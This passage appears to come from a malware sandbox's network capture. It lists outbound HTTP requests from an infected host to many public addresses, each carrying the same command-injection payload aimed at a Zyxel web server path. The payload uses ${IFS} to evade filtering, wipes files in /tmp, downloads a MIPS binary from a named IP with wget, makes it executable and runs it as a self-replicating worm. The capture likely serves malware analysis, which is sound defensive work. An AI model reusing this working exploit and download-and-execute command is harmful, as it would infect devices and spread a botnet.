                                            Jan 14, 2024 15:50:39.413868904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4269192.168.2.2339034206.251.129.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413901091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4270192.168.2.233312068.234.111.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413934946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4271192.168.2.234554845.151.212.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413954973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4272192.168.2.233437653.2.114.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413981915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4273192.168.2.2336534173.157.58.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414005995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4274192.168.2.2356558205.89.84.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414040089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4275192.168.2.23508089.38.206.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414094925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4276192.168.2.234531819.233.39.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414107084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4277192.168.2.2343250163.39.219.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414134979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4278192.168.2.235913682.118.9.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414165020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4279192.168.2.233851631.87.229.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414206028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4280192.168.2.2360502193.52.156.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414208889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4281192.168.2.234390427.178.2.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414231062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4282192.168.2.234285613.41.222.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414252996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4283192.168.2.2342638102.116.51.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414302111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4284192.168.2.2357660123.117.14.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414351940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4285192.168.2.2345088136.51.208.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414383888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4286192.168.2.233518293.197.171.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414383888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4287192.168.2.233556474.115.58.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414395094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4288192.168.2.234395688.41.81.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414402962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4289192.168.2.2352804151.156.139.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414413929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4290192.168.2.2334436124.157.70.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414433956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4291192.168.2.2347358159.237.58.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414448023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4292192.168.2.233821012.132.206.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414486885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4293192.168.2.2333524152.110.215.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414509058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4294192.168.2.233553650.90.101.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414531946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4295192.168.2.2355118110.217.254.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414577007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4296192.168.2.2344030141.119.19.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414617062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4297192.168.2.2358728137.93.176.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414618015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4298192.168.2.235281019.55.22.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414654970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4299192.168.2.2360472178.41.225.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414695978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4300192.168.2.2357544112.176.202.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414716959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4301192.168.2.23439985.245.200.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414740086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4302192.168.2.235221445.121.239.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414777994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4303192.168.2.235100041.196.151.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414813042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4304192.168.2.2341740199.12.151.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414841890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4305192.168.2.234066864.159.119.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414851904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4306192.168.2.23361805.143.218.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414916039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4307192.168.2.2342110128.231.173.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414922953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4308192.168.2.2352162198.95.208.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414947987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4309192.168.2.2339498208.237.45.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.414999008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4310192.168.2.235497496.93.214.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415016890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4311192.168.2.2349398222.129.93.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415038109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4312192.168.2.235224869.49.90.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415066957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4313192.168.2.234023286.134.56.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415097952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4314192.168.2.234446841.179.99.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415157080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4315192.168.2.2352432141.183.224.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415180922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4316192.168.2.2355848201.204.168.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415204048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4317192.168.2.2355180192.73.168.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415235996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4318192.168.2.2343182111.8.155.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415285110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4319192.168.2.2346866110.142.187.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415303946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4320192.168.2.2357898110.248.188.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415344000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4321192.168.2.2336450114.80.246.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415374994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4322192.168.2.233986869.30.68.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415390015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4323192.168.2.2351624187.70.195.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415419102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4324192.168.2.2345048191.243.18.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415462971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4325192.168.2.234017859.104.110.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415483952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4326192.168.2.2344106166.73.79.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415515900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4327192.168.2.2352476137.98.251.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415543079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4328192.168.2.233641494.167.56.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415550947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4329192.168.2.234961470.130.161.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415586948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4330192.168.2.234973699.34.124.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415602922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4331192.168.2.2359924131.107.106.221443
                                            TimestampBytes transferredDirectionData
